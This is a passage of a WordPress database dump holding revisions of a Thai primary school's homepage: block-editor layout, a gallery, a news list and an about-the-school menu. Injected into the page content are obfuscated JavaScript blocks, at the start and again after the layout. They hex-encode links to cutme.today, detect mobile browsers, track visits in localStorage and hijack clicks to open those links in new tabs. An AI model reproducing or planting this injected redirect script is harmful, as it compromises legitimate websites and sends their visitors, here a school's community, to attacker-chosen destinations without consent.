_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:04:36','2024-07-27 04:04:36','',14,'http://pakhaeng.ssk.in.th/?p=73',0,'revision','',0),
(74,1,'2024-07-27 11:05:01','2024-07-27 04:05:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 